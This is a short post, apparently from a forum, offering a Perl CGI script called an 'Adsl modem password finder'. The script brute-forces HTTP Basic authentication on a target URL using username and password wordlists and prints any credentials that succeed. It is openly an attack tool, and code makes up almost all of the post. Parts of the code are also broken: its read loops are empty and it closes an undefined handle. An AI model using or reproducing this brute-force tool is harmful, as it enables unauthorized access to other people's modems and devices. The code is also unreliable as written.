Adsl modem password finder

tihs is another my cgi script , the word matching algortihm is perfect taking from
websec.org.


#!/usr/bin/perl

###################################

use LWP;
use Getopt::Std;
use HTTP::Request::Common;
use HTTP::Response;
use MIME::Base64;
use CGI qw(:all);

use vars qw($opt_a $opt_u $opt_p $opt_l $opt_v);
getopts("a:u:p:l:v:");


## vardecs
##

my $userfile = "/tmp/username";
my $passfile = "/tmp/password";
my %BASEPASS;
print header, start_html();
my $ipaddress = param("password");
print end_html();
open(UF, "< $userfile") || die "\ncant open $userfile\n";

while ()
{
my $uid = $_;

##
open(PF, "< $passfile") || die "\ncant open $passfile\n";
##
while ()
{
my $pwd = $_;

my $user_agent = new LWP::UserAgent;
$user_agent->agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)");


$uid =~ s/[\n\r]//g;
$pwd =~ s/[\n\r]//g;
$pwd = &special($uid,$pwd);

my $response = $user_agent->request(GET "$ipaddress", Authorization => "Basic ".encode_base64("$uid:$pwd"));

if ($response->is_success)
{
print p("Kullanici_Adi: $uid");
print p("Sifre:$pwd");

}
else
{

#print p("Sifre Bulunamadi");
#print RF "$uid:$pwd (",$response->code(),")\n" if ($logfile ne '');
}
}
close(PF);
}
close (UF);
close (RF);


### sub special (pwd,uid)
### returns pwd

sub special
{
my $u = shift;
my $p = shift;

## check for %%UID%% in password
##
$p =~ s/%%UID%%/$u/ if($p =~ /%%UID%%/);

## check for %%UIDREV%% in password

##
if ($p =~ /%%UIDREV%%/)
{
my $tmp = "";
my $c = 0;

for ($c=length($u);$c>=0;$c--)
{
$tmp .= substr($u,$c,1);
}
$p =~ s/%%UIDREV%%/$tmp/;
}

## done
##
return $p;
}